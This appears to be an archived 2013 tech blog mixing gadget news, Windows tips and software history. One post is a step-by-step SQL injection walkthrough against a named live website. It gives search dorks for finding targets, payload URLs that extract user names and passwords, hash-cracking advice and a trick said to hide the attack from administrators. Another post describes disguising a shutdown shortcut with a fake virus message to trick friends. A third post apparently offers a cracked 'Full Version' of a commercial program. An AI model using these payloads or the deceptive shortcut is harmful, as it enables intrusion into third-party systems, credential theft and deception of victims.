Saturday, 23 February 2013

26 ) Google unveils expensive high-resolution Chromebook Pixel touchscreen laptops

San Francisco: Google is adding a new and more expensive touch to its line of Chrome laptops in an attempt to outshine personal computers running on software made by rivals Microsoft and Apple.
The Chromebook Pixel unveiled Thursday includes a nearly 13-inch display screen that responds to the touch or swipe of a finger. That duplicates a key feature in Microsoft's Windows 8, a dramatic makeover of the world's leading operating system for PCs.
The Pixel's high-resolution screen displays 239 pixels per inch, slightly more than Apple Inc.'s MacBooks with high-resolution Retina displays. A MacBook Pro with a screen that measures 13.1 inches diagonally can handle 227 pixels per inch, while the 15.4-inch model is at 220 pixels per inch.
Google unveils expensive high-resolution Chromebook Pixel touchscreen laptops
"This is the future: high-resolution screens and touch," said Sundar Pichai, a senior vice president who oversees Google's Chrome Web browser and operating system.
Google designed and built the Pixel for "power users" - a fastidious and generally more affluent segment of the PC market willing to pay more for machines equipped with compelling features and components not found in cheaper laptops.
The strategy is a departure for Google, which had positioned Chromebooks based on its Chrome operating system as affordable options for homes and offices looking for a quick and easy way to connect to the Web. Google has been partnering with PC makers to make Chromebooks over the past two years. Among them: Acer makes a bare-bones Chromebook for just $199, while Samsung Electronics sells one for $249.
The Pixel, which Google is building without a partner, will cost $1,299 for a Wi-Fi only model with 32 gigabytes of flash storage. A 64-gigabyte machine that can connect on both Wi-Fi and a 4G LTE cellular network will cost $1,499. That's the same price as the cheapest MacBook Pro with a comparable screen, though the Apple laptop comes with 128 gigabytes of storage.
Apple does have a cheaper, lighter laptop, the MacBook Air. A 13-inch model with 128 gigabytes of storage starts at $1,199. It weighs less than 3 pounds and doesn't have a high-resolution screen. The Pixel has the high-resolution screen and weighs 3.35 pounds. The 13-inch high-resolution MacBook Pro weighs 3.57 pounds.
Google believes Pixel is a better value than the Air, given its higher-resolution screen with touch controls. Google is also throwing in 1 terabytes of free online storage in its data centers for three years - a benefit that Pichai estimated would cost $500 to $600.
The Pixel "will stand up very, very well to the MacBook Air," Pichai said. "The goal here is to push the boundaries to deliver the best laptop at the best possible price."
Though its popular iPad has a touch screen, Apple has shunned touch-screen laptops. Apple figures that because people use laptops with the screen in front of them, rather than in their hands or laps, it's not a pleasant experience to constantly have to reach out to touch the screen.
Microsoft, on the other hand, considers touch screens to be central to all computing environments. Windows 8 was designed to make desktop and laptop computers work more like tablet computers. Computers with touch-screen monitors can respond to touch along with old-style mouse and keyboard commands.
Google's online Play store will begin selling the Pixel in the US and UK from Thursday, with BestBuy.com expected to take orders on Friday. A hands-on experience with the Pixels also will be available beginning Friday in 10 of Best Buy's retail stores in California, Minnesota, Washington state, Virginia and New York.
Pichai declined to say how many of the lower-priced Chromebooks have been sold, but said the models have ranked as the most popular laptop sold by Amazon.com for the past four months.
The free online storage is being included with the Pixel to overcome the laptop's lack of a hard drive. Like other Chromebooks, the Pixel functions like a terminal dependent on an Internet connection to get to information and applications stored in large data centers run by Google or other technology providers.
Spurred by the growing popularity of smartphones and tablet computers, Google is betting more people will prefer having data, photos and video stored in remote data centers instead of individual hard drives so the content can be accessed from any Internet-connected device.
Google's expansion into the high-end of the laptop market immerses the Internet search and advertising company more deeply into the business designing and making gadgets.
The company is already a major player in the mobile device market through its Android software. To help promote Android, Google also has designed a line of smartphones and tablets under the Nexus brand. The company also owns smartphone maker Motorola Mobility, which it bought for $12.4 billion last year.
Google's deepening involvement in hardware has ignited speculation that the company might eventually open its own chain of stores to sell its products, just as Apple and Microsoft already do. Pichai didn't address that in a response to a question on that topic at Thursday's event.
Apple and Microsoft already have been hurt by the increased competition from Google. Most smartphones and tablets running on Google's free Android software cost less than Apple's iPhone and iPad, helping to siphon sales away from those devices. Sales of PCs running on Windows also have been sagging during the past year, partly because consumers are relying more on Android devices.
Google says it expects to make a small profit on each Pixel sold, but the company figures to make more money from the online traffic delivered from the machines. Like other Chromebooks, the Pixel is set up to automatically use all of Google's services, including its search engine, Gmail and YouTube video site.
 http://www.youtube.com/watch?v=j-XTpdDDXiU&feature=player_embedded

25) First Facebook, then Apple and now Microsoft's computers hacked

Seattle: Microsoft said on Friday a small number of its computers, including some in its Mac software business unit, were infected with malware, but there was no evidence of customer data being affected and it is continuing its investigation.
The world's largest software company said the security intrusion was "similar" to recent ones reported by Apple and Facebook.
The incident, reported on one of the company's public blogs happened "recently", but Microsoft said it chose not to make any statement publicly while it gathered information about the attack.
First Facebook, then Apple and now Microsoft's computers hacked
"This type of cyberattack is no surprise to Microsoft and other companies that must grapple with determined and persistent adversaries," said Matt Thomlinson, general manager of Trustworthy Computing Security at Microsoft, in the company's blog post.
Over the past week or so, both Apple and Facebook said computers used by employees were attacked after visiting a software developer website infected with malicious software.
The attacks come at a time of broader concern about computer security.
Newspaper websites, including those of The New York Times, The Washington Post and The Wall Street Journal, have been infiltrated recently. Earlier this month US President Barack Obama issued an executive order seeking better protection of the country's critical infrastructure from cyber attacks.

Friday, 22 February 2013

24) Charge your mobile phone with hot water

New Delhi: While researchers are busy finding newer sources of energy and ways of harvesting it, Ryan Johnstone, an independent inventor based in Nairobi, Kenya, has invented a solution that could help mobile phone users charge their devices with just the power of hot water. Ryan has developed the Bottle Charger, as he likes to call it, an apparatus that utilises the power of hot water to run a small turbine, which in turn produces electric current potent enough to charge small devices.
Explaining its working, Ryan said to The Mobile Indian, "The Bottle Charger works like a small wind turbine. Instead of natural wind currents, the pressurised air is created by expansion and contraction due to the presence and absence of hot water."
This change in air pressure is then used to run a small turbine that sits inside the apparatus and generates electricity for charging mobile devices. The inventor claims that the Bottle Charger creates electricity as long as you have access to hot water of around 100 degrees Celsius. With this the Bottle Charger enables users to charge smaller electronic devices such as mobile phones, MP3 players and so on for 15-30 minutes depending on surrounding temperatures.

The Bottle Charger involves using a 20 litre water jar along with a BUCT (Blackbeard Unidirectional Constant Turbine) module to create electricity. The quality of water does not cause any difference; it can be normal tap water as well.
The project is in its very nascent stage but holds promise. The inventor has taken help of crowd funding website Indiegogo to raise money to make the device better and smaller.
 For Video : http://www.youtube.com/watch?v=wPZkNa9PTJE&feature=player_embedded

Monday, 18 February 2013

23) Optimus G Pro: LG to launch its first full HD smartphone this week

Seoul: LG Electronics Inc. said Monday its new smartphone with a full high-definition screen will go on sale in South Korea this week before hitting shelves in Japan in April.
The Optimus G Pro smartphone features a 5.5-inch screen that packs over 2 million pixels, or twice as many as smartphones with HD screens. The new Android-powered phone sports other upgrades including a camera that can shoot full HD videos and photographs.
The South Korean company, Sony Corp., HTC Corp. and other phone manufacturers are trying to make high-resolution screens a key feature in their new smartphones this year.
Optimus G Pro: LG to launch its first full HD smartphone this week
The Full HD IPS display on the Optimus G Pro - developed in partnership with LG Display - delivers 1920 x 1080 pixels at 400ppi.
Full HD screens are more common in televisions but smartphone makers began to embrace them this year amid cutthroat competition. One in every two smartphones is made by Samsung Electronics Co. or Apple Inc., creating a hardscrabble fight among the second-tier of makers.
The Optimus G Pro also comes with advanced UX features developed specifically for the device, such as Dual Recording and Virtual Reality (VR) Panorama. Dual Recording allows users to capture video with both the front and rear cameras simultaneously for a unique picture-in-picture experience. And VR Panorama allows shots of entire horizontal and vertical environments for a full 360 degree view.
LG executives said their current goal is elevating the reputation of the Optimus brand after turning around the company's mobile communications business following years of losses.
The Optimus G Pro is available at 968,000 won ($894) without in South Korea without a mobile carrier contract.
The model will be on display at the annual mobile fair in Barcelona, Spain kicking off next week.
Once the world's No. 3 mobile phone maker, LG was the fifth-largest mobile phone maker by shipments in 2012 after Samsung, Nokia Corp., Apple and ZTE Corp., according to market research firm IDC.
Optimus G Pro Key Specifications:
- Chipset: 1.7GHz Quad-Core Qualcomm® Snapdragon™ 600 Processor
- RAM: 2GB DDR
- Memory: 32GB / microSD (up to 32GB)
- Display: 5.5-inch Full HD (1920 x 1080 pixels / 400ppi)
- Camera: Rear 13.0MP with LED Flash / Front 2.1MP
- OS: Android 4.1.2 Jelly Bean
- Battery: 3,140mAh (removable / wireless charging capable)
- Size: 150.2 x 76.1 x 9.4mm
With inputs from Associated Press

Sunday, 17 February 2013

22) Transparent smartphone to debut by the end of 2013

London: In a revolutionary development, a Taiwanese company claims to have developed a gen-next transparent mobile phone which it says will be in the market by the year end. The company, Polytron Technologies, has already begun marketing a transparent multi-touch phone. Its prototype uses a 'Switchable Glass' technology.
That is a conductive Organic light-emitting diode (OLED) using liquid crystal molecules to display images, the 'Daily Mail' reported.
When the phone is in off mode, the molecules align to form a milky composition, but when switched on they re-align to form text, icons, and other images. Electric current is carried through transparent wires. "It will happen near the end of 2013. Trust me," said Polytron general manager Sam Yu.
Transparent smartphone to debut by the end of 2013
The device still contains some parts that are not transparent, including a SD card and SIM card. The microphone, camera, and batteries are also visible, and will be hidden behind a dark glass cover when the model goes into production.
The company, according to Yu, will develop a smaller lithium ion battery that would be much less noticeable. When complete, the phone will have a dual-sided multi-touch display in front and back.
The prototype phone has yet to feature any software or operating system, the report said. A Japanese company recently used a transparent liquid crystal display (LCD) in its wristwatch but had trouble adding hardware to the smaller frame.
"The challenge of using a transparent display in a wristwatch, and I suppose other wearable technology, is that you need to store the batteries somewhere else (usually they are stored behind the LCD panel)," Tokyoflash marketing manager Paul Cooper said.
It remains to be seen whether the phone's transparency by itself will attract buyers, as the prototype does not offer significantly different functions than most smartphones.
"Display quality is paramount," Avi Greengart, research director at Current Analysis, told The Verge.
"If the display quality is not up to par with the best of today's AMOLED and LCD screens, a phone using it won't sell even for its novelty value," said Greengart.
http://www.youtube.com/watch?v=tkhWXspmiYE&feature=player_embedded

Saturday, 16 February 2013

21) CMD Prompt here, add to folder context menu windows xp


 add the open cmd prompt to folder context menus
also drives and My Computer

copy what's in the code area to notepad and save as cmd here.reg

CODE

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Drive\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_CLASSES_ROOT\Directory\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]
@="Command Prompt"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

Friday, 15 February 2013

20 ) CODE FOR C

1.for rings a bell -->    '\a'

Escape Sequence     Meaning

    \a          Alarm (the terminal's bell)
    \b          Backspace
    \f           Form feed (for the printer)
    \n          Newline (carriage return and line feed)
    \r          Carriage return
    \t          Tab
    \v          Vertical tab
    \\          Backslash (\)
    \?         Question mark
    \'          Single quotation mark
    \"          Double quotation mark
    \ooo     Octal number
    \xhh      Hexadecimal number
    \0         Null zero (or binary zero)


Sunday, 10 February 2013

19) How to Shutdown Someone's computer while Chatting

Try at your own risk. I am not responsible for your own deeds. For educational purpose only.

How to Shutdown Someone's computer while Chatting


It can be the coolest thing to do with you friends while chatting. There is no Limitation on the messenger but the messenger should provide the file transfer service to send the following Program.

STEP 1:
Right-click on any folder goto -> New -> Shortcut.

STEP 2:
Type in shortcut %windir%\system32\shutdown.exe -s -t 120 -c "The 31HA0w Virus Have invaded your Computer. And it is deleting your files"

STEP 3:
Right-click the shortcut goto -> Properties -> Choose Icon. Now choose any icon of your choice.

STEP 4:
Compress the file in ZIP and sent it to your friend while chatting and ask him to run it

WARNING: You can be punched on Nose by your FRIEND.
HAHAHA

18) Hacking a website in a very easy way. (Sql injection)

Try at your own risk. I am not responsible for your own deeds. For educational purpose only.
SQL Injection Basics - Union Based [Detailed Tutorial]
Well, I would not be blogging about some thing new, however, it was missing at RHA for a long long time, thought there are tools out there to carry out all sorts of SQL Injection attacks however if you don't know what your tool is exactly doing at the backend then it's useless and the best way to learn according to me is doing it manually. As there is a saying that "A fool with a tool is always a fool", With that being said, i would like to summarize what i would be talking about in this post. Basically, i would be targeting a live website that is known to be vulnerable to SQL Injection, i have reported them many times, however they don't care so therefore i am making a full disclosure. Also in this post i would not be explaining what a SQL injection is (In Detail), because i feel that there are tons and tons of websites that have already written about it. However, i would talk more about the testing process.

What Is SQL Injection?

SQL Injection is one of the most commonly found vulnerabilities present on the web, It holds the number one place in Owasp Top 10. A SQL Injection can be defined as an attack in which we append SQL queries in order to extract the data present in the database. This normally occurs due to lack of input validation. SQL Injection can also commonly used by attackers to bypass authentication, however here, we would focus on Data extraction with SQL Injection.

Finding A Vulnerable Website

In order to begin with this tutorial, you would need a vulnerable website. Either, you could use the one, which i would be mentioning in this tutorial, or you could find your own. You could use variety of google dorks for this purpose. Here are some of the common dorks to find a SQL Injection vulnerability:

inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=

Alternatively to save your self some time, you could use a neat tool called "Xcode Exploit Scanner"  which would use built in dorks in order to find a SQL injection vulnerability.

 

 

 

 

 

 

 

 

 

 

 

Testing For SQL Injection

http://www.outreachforyouth.org/description.php?recordID=1

We would test the above website for a SQL injection vulnerability. Which could clearly from the url that recordID parameter is accepting the input, these places are more likely to have a sql injection vulnerability as there are chances that the input validation is not performed. So in order to test for a SQL Injection vulnerability, we would insert a ', after the input, this would break the query. Depending upon the database, we would get different types of errors.

On appending the ', we get an error:

Request: http://www.outreachforyouth.org/description.php?recordID=1

we get the following error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


Determining The Number Of Columns:


In Mysql, an order by command is used to order a sequence in a particular order, here we would be using an order by command to determine the number of columns. Our first request would look like:

http://www.outreachforyouth.org/description.php?recordID=1 order by 1--

The page loads fine.

We would keep increasing the order by command number until we get an error, which would usually be something like "Unknown column in 'order clause'" or something similar to it. So in this case

http://www.outreachforyouth.org/description.php?recordID=1 order by 1-- No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 2-- No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 3-- No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 4-No error http://www.outreachforyouth.org/description.php?recordID=1 order by 6--No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 7--No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 8--No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 9--
No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 10--No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 11--No error
http://www.outreachforyouth.org/description.php?recordID=1 order by 12--Error

Hence we conclude that the number of columns are 11. 

String Method

In above example, the column count were found by integer method. However, sometimes, we would need to use string method in order to find columns count, In that case, no matter how you much you increase the order count the page will load fine, in those cases, you would keep the ' appended when determining the column count.

Example:

http://www.outreachforyouth.org/description.php?recordID=1' order by 11--


Finding A Vulnerable Coulmn


Next, we would need to find the vulnerable column, which would be used to extract data from the database. We would use a Union command, which is the combination of two select statements in order to extract the data. Along with it, we will also place a negative sign just after the equal sign.

Example

http://www.outreachforyouth.org/description.php?recordID=-1 Union all select 1,2,3,4,5,6,7,8,9,10,11--






















So, as you can look at the above picture is that we see 3,4 and 6th column on the page. This shows us that these particular columns are being used to display information on the web page and can be used to extract information from the database.


Other Methods

http://www.outreachforyouth.org/description.php?recordID=-1 Union all select 1,2,3,4,5,6,7,8,9,10,11--
http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 Union all select 1,2,3,4,5,6,7,8,9,10,11--
http://www.outreachforyouth.org/description.php?recordID=Null Union all select 1,2,3,4,5,6,7,8,9,10,11--


Fingerprinting The Database

The next step would be to use the vulnerable column in order to finger print the database. We would use the following commands.

user() - Shows the current user.
version() - Displays the database version (Super Important)
database() - Displays the name of the database.

Let's finger print the database information.

Example:

http://www.outreachforyouth.org/description.php?recordID=-1 Union all select 1,2,3,version(),5,6,7,8,9,10,11--
http://www.outreachforyouth.org/description.php?recordID=-1 Union all select 1,2,3,user(),5,6,7,8,9,10,11--
http://www.outreachforyouth.org/description.php?recordID=-1 Union all select 1,2,3,database(),5,6,7,8,9,10,11--

Extracted Information

Database Version: 5.1.66-cll
User: outreach_db_user@localhost
Database: outreach5



























We are lucky that we have version 5 here, therefore it's possible for us to extract the table names, however, if the version would have been less than 5, we would had to guess the table names, because in mysql version 4, there is no information_schema which links all the databases.


Extracting The Table Names


Now, we add queries to extract the table names from the current database, we would use group_concat inside the vulnerable column order to extract all the tables.

Note: If we would just use concat, we would be able to extract only one table name.  

Example

http://www.outreachforyouth.org/description.php?recordID=-1 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11 from information_schema.tables




















This would extract all the table names. However most of them would be unimportant for us, we are in search for the tables such as users, administrators etc. So therefore to filter out our search to only extract tables from the current database.

Example

http://www.outreachforyouth.org/description.php?recordID=-1 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--









Extracted Tables

 church testimonies,description,testimonies,users


We have successfully extracted four tables, however the most important data would be contained inside the users tables.


Converting The Table Names To Hex Or Mysql Char


Most of the times the table names would not work when extracting data from a table, therefore i would recommend you to either convert the table_names to hex or my sql char. You can google for online tools or use hackbar in order to convert.

Hex Equivalent:

User = 0x5573657273

Mysql Char Equivalnet:

User = CHAR(117, 115, 101, 114, 115)

So now our query would become:

Example

http://www.outreachforyouth.org/description.php?recordID=-1 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--

So, what the above query is asking is to return all the columns in table from information_schema.columns where the table name is the char equivalent of users.






















So, three columns were returned inside the users table:

id, name, password. 

Now it's time to extract the id, name and password from the users table.

Our final query would be:

Example

http://www.outreachforyouth.org/description.php?recordID=-1 union all select 1,2,3,concat(id,name,password),5,6,7,8,9,10,11 from users--

So, in the above query we are just asking the database for the data behind the id, name and password from the table users. You may have noticed that we used concat here instead of group_concat, this is because, we wanted just to extract the password for the first user which is always the administrator.



In order to format it well, we can use table exits.

Example:


http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,concat(id,0x3a ,name,0x3a,password,0x3a),5,6,7,8,9,10,11 from users--






















So finally we have extracted the username and password from the database. Some websites store the passwords in form of hashes, you would mostly see MD5 hashes, if you come across a MD5 hash, You can use tons of services online to decrypt the hash. My favorite is Md5 decrpyter (http://www.md5decrypter.co.uk/) , it contains list of more than 8.7 billion decrypted passwords. Alternatively, you can also perform brute force or dictionary attacks using a tool called PasswordsPro, You could also launch a GPU based password cracking attack by using a tool called OCI hash cat.


Hiding Queries From The Administrators

In order to avoid administrators noticing the attack, we would need to append sp_password at the end of the query. Here is the query:

Example:

http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,user(),5,6,7,8,9,10,11-- sp_password

Queries Summary


Vulnerability
http://www.outreachforyouth.org/description.php?recordID=1
'
Determining the number of Columns

http://www.outreachforyouth.org/description.php?recordID=1 order by 1,2,3,4,5,6,7,8,9,10,11--
Union Comman to find vulnerale Columns
http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,4,5,6,7,8,9,10,11--
Version Detection 
http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,@@version,5,6,7,8,9,10,11--
User detection

http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,user(),5,6,7,8,9,10,11-- sp_password
Database 

http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,database(),5,6,7,8,9,10,11--
Database Version: 5.0.675
User: outreach_db_user@localhost
Database: outreach5
Extracting the tables 
http://www.outreachforyouth.org/description.php?recordID=-1 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=users()--
Table
churchtestimonies,description,testimonies,users
Extracting Passwords Using Table Exits
http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,concat(id),5,6,7,8,9,10,11 from users--

http://www.outreachforyouth.org/description.php?recordID=1 and 1=0 union all select 1,2,3,concat(id,0x3a ,name,0x3a,password,0x3a),5,6,7,8,9,10,11 from users--
So this concludes this post, I would try to cover other advanced techniques such as time based techniques for SQL injection in my upcoming posts.

Enjoy....

Friday, 8 February 2013

17) How to Troubleshoot Mozillafirefox



firefox-crash-embarrassing

Firefox can crash for a variety of reasons, but you can quickly fix most crashes with Firefox’s Safe Mode and Reset features. However, even these tricks won’t fix every crash.
Web browsers are complicated pieces of software that interact with lots of other software on your system – extensions and themes, plug-ins, security programs, graphics drivers, and more. Incompatibilities or out-of-date software can often cause crashes.

Use Safe Mode

Firefox has a Safe Mode that loads Firefox without loading your add-ons. To activate Safe Mode, click the Firefox menu, point to Help, and select Restart with Add-ons Disabled. You can also enter Safe Mode by holding the Shift key while starting Firefox.
Try using Safe Mode for a while if Firefox is crashing. If Safe Mode works properly, the problem is with one of your add-ons. You may want to leave Safe Mode and disable add-ons one-by-one until you identify the add-on causing the problem.

Reset Firefox

Firefox stores your personal data in a profile folder. Problems can occur with your profile folder, but you do not have to waste time identifying and fixing the exact cause. Firefox’s Reset feature will create a new profile folder, migrating over your bookmarks, browser history, saved passwords, cookies, and auto-fill information.
You will lose your extensions, themes, search engines, and site-specific preferences when you reset Firefox. Extensions and themes in particular can cause crashes, so getting rid of them and starting from a clean profile can be helpful.
To reset Firefox to its default state, open the Firefox menu, point to Help, and select Troubleshooting Information.
Click the Reset Firefox button. Firefox will create a new profile for you and migrate most of your old information over. The new, clean profile should hopefully fix your crashes.
If Firefox starts crashing again after you reinstall your favorite extensions, one of your extensions is likely causing the crashes. Try reinstalling extensions one-by-one to identify if a particular extension is causing problems.

Disable Hardware Acceleration

Firefox’s hardware acceleration feature uses your computer’s graphics card to render text and objects on web pages. This speeds up web page rendering and takes some load off your CPU. However, hardware acceleration can cause problems with some graphics drivers and graphics cards.
You can determine whether hardware acceleration is the problem by disabling it. To do so, click the Firefox button and select Options. Click the Advanced icon and uncheck the Use hardware acceleration when available checkbox.
Try using Firefox for a while after disabling this feature. If Firefox stops crashing, hardware acceleration was likely the problem. You can try installing updated graphics drivers and see if they fix the problem. If they don’t, you should leave hardware acceleration disabled on your system.
Note that you should not disable hardware acceleration if everything is working properly, as this is a useful feature.

Check for Malware

Malware can cause Firefox to crash, just as it can cause other programs to crash on your system. If Firefox is regularly crashing, scan your computer with an antivirus program likeMicrosoft Security Essentials. If you already have an antivirus program installed, you may want to get a second opinion from another antivirus program.

Update Software

Mozilla recommends updating the software on your system if Firefox is crashing. Here is a list of everything you should update:
  • Firefox: Click the Firefox menu, point to Help, and select About Firefox. Download and install any available updates.
  • Plug-ins: Visit the Firefox plug-in update check page. The page will scan your browser for outdated plugins. Follow the links to download and install updates for any outdated plugins.
  • Extensions and Themes: Click the Firefox button, click Add-ons, and select Extensions. Click the gear menu and select Check for Updates. Install any updated add-ons.
  • Windows: Use Windows Update to ensure Windows is up-to-date.
  • Graphics Drivers: Install updated graphics drivers to fix problems with hardware acceleration.
  • Internet Security Software: Install the latest versions of any firewalls, antivirus programs, Internet security suites, and other security applications installed on your system.

Hardware problems can also cause Firefox – and other software – to crash. Try checking your computer’s RAM for errors if crashes continue to occur.

 

Tuesday, 5 February 2013

16 ) TeraCopy PRO v2.27 [Full Version]






HOW TO DOWNLOAD?
1- Click On Slow Speed Download...
2-Wait For 60 Seconds...
3-Enter The Code...
4-Click On "Link To The File Download"..You're Done !


TeraCopy is a free of charge application that allows you to copy and move files at the maximum possible speed. It can also pause and resume file transfers. TeraCopy is a compact program designed to copy and move files at the maximum possible speed, providing the user a lot of features:

- Copy files faster. TeraCopy uses dynamically adjusted buffers to reduce seek times. Asynchronous copy speeds up file transfer between two physical hard drives.
- Pause and resume file transfers. Pause copy process at any time to free up system resources and continue with a single click.
- Error recovery. In case of copy error, TeraCopy will try several times and in the worse case just skips the file, not terminating the entire transfer.
- Interactive file list. TeraCopy shows failed file transfers and lets you fix the problem and recopy only problem files.
- Shell integration. TeraCopy can completely replace Explorer copy and move functions, allowing you work with files as usual.
- Full Unicode support.
- Windows 7 x64 support. 


Sunday, 3 February 2013

15 ) Difference between Win 7 & Win 8 CP (Changes & Improvements)

Changes and Improvement in Windows 8 ( Windows 7 Vs Windows 8 )


Window 7
Windows 8 (CP)
Boot time: 48 sec.
Boot time: 10 sec.
Installation time: minimum 35 min. approx. (varies depending on the system)
Installation time: minimum 15 min. approx. (varies depending on the system)
Start menu: as usual
Start menu: Microsoft has replaced the normal shortcut icons with dynamic LIVE tiles.
Their size can be changed & they can be adjusted by placing similar software (applications) stacked together around each other- or anything else to suit our liking.
Themes & Wallpapers: as usual
Themes & Wallpapers: automatic themes which can adjust their colour to match the wallpaper you use.
Improves the overall look & feel of the desktop totally.
New Software & Apps: almost none or available through updates only.
MS Store has been launched provides very useful, informative, entertaining, latest available apps made solely for win8
Games: Chess Titans, FreeCell, Hearts,Mahjong Titans, Mine Sweeper, Purble Place, Solitaire, Spider Solitaire, (online games: Internet Backgammon, Internet Checkers, Internet Spades).
Games: Cut The Rope, Train Titans,Flow, Flip Saw, Puzzle Touch, Pinball FX 2, Solitaire, Mahjong Deluxe, Wordament, Air Soccer, Carmen Sandigo, Hive Mind, Pirate Love Daisies, Ultraviolet Dawn, Hydro Thunder Hurricane, Euro Cup.
Windows Photo Viewer
Photos App, 6 Camera Apps.
Windows Media Player for music
Music App
Windows Media Player for videos
Video App
Weather Info: Sidebar Gadget – Weather
Elements Weather Forecast, Weather App.
IsoImages : additional virtual drive software required such as: Power Iso, Alcohol 120%, Daemon Tools etc.
No. of virtual drives is limited according to the software used.
Windows 8 itself has inbuilt ability that allows you to create a virtual drive to mount the ISO image so that you can easily use it just like a normal DVD.
No. of virtual drives not limited.
Antivirus Required
Built-in Antivirus (bad news for hackers): Windows 8 has an antivirus present inside the kernel of the operating system. This means that your system won’t boot if a corrupt USB device is plugged in. It sounds impressive though we yet don’t know whether it would pass the test of time…. & viruses!
PDF files: additional PDF reader is required such as: Foxit Reader, Adobe Reader etc.
Reader App: inbuilt capability to read PDF files.
Browser: IE8 (upgradable to 9) or IE9
2 Separate browsers IE9 & futuristic IE10
 
Enhanced multiple monitors support:Microsoft has announced that users can now separately use morethan one monitor to connect withWin 8operating system running on a single PC. Win 8’s PCmanagement allows user to use multiple monitors atsame time with allowing the flexibility offered never before by allowingstart screen at one monitor & desktop in another.
One can also choose taskbar onboth screens having different icons oneach monitor; it is just like having 2 different PC’s.Moreover, you can play with wallpapersalso bychanging them separate on each monitor.Such support isn’t there inwin 7.
The settings areahascontextual apps likevolume, brightness, restart&shutdown buttons. We canalso share stuffs, links & contacts etc. as Hotmail, Gmail, Facebook &Twitter support also has been provided but limited only.& on other side, win 7 is missingall these cool social networking features.
All in all, I do expect Windows 8 to be a serious upgrade on Windows 7 and with Microsoft working on the things that require some tweaking; I genuinely believe that Microsoft is finally ready to launch an OS which will take the world by storm.
 

Saturday, 2 February 2013

14 ) Borland C

If U don't have Borland C Then Click This Link And Dawnload Now...                      



                                                     http://cristijuverdeanu.ro/download-borland-c-3-1/



Borland C


Borland Software Corporation is a software company first headquartered in Scotts Valley, California, then in Cupertino, California, and finally in Austin, Texas. It is now a Micro Focus subsidiary. It was founded in 1983 by Niels Jensen, Ole Henriksen, Mogens Glad and Philippe Kahn.

History

The 1980s: Foundations

Three Danish citizens, Niels Jensen, Ole Henriksen, and Mogens Glad, founded Borland Ltd. in August 1981 to develop products like Word Index for the CP/M operating system using an off-the-shelf company. However, response to the company's products at the CP/M-82 show in San Francisco showed that a U.S. company would be needed to reach the American market. They met Philippe Kahn, who had just moved to Silicon Valley, and who had been a key developer of the Micral. The three Danes had embarked, at first successfully, on marketing software first from Denmark, and later from Ireland, before running into some challenges at the time when they met Philippe Kahn. The partnership seems to have benefited all involved. Philippe Kahn was at all times Chairman, President, and CEO of Borland Inc. from its inception in 1983 until he left in 1995. Main shareholders at the incorporation of Borland were Niels Jensen (250,000 shares), Ole Henriksen (160,000), Mogens Glad (100,000), and Philippe Kahn (80,000).

Borland successfully launched a series of blockbusters that included Turbo Pascal, SideKick, SuperKey, and Lightning, all developed in Denmark. According to the London IPO filings, the management team was Philippe Kahn as President, Spencer Ozawa as VP of Operations, Marie Bourget as CFO, and Spencer Leyton as VP of business development, while all software development was continuing to take place in Denmark and later London as the Danish co-founders moved there. While the Danes remained majority shareholders, board members included Philippe Kahn, Tim Berry, John Nash, and David Heller. With the assistance of John Nash and David Heller, both British members of the Borland Board, the company was taken public on London's Unlisted Securities Market (USM) in 1986. Schroders was the lead investment banker.
A first US IPO followed in 1989 after Ben Rosen joined the Borland board with Goldman Sachs as the lead banker and a second offering in 1991 with Lazard as the lead banker. All offerings were very successful and over-subscribed.

The 1990s: Rise and change

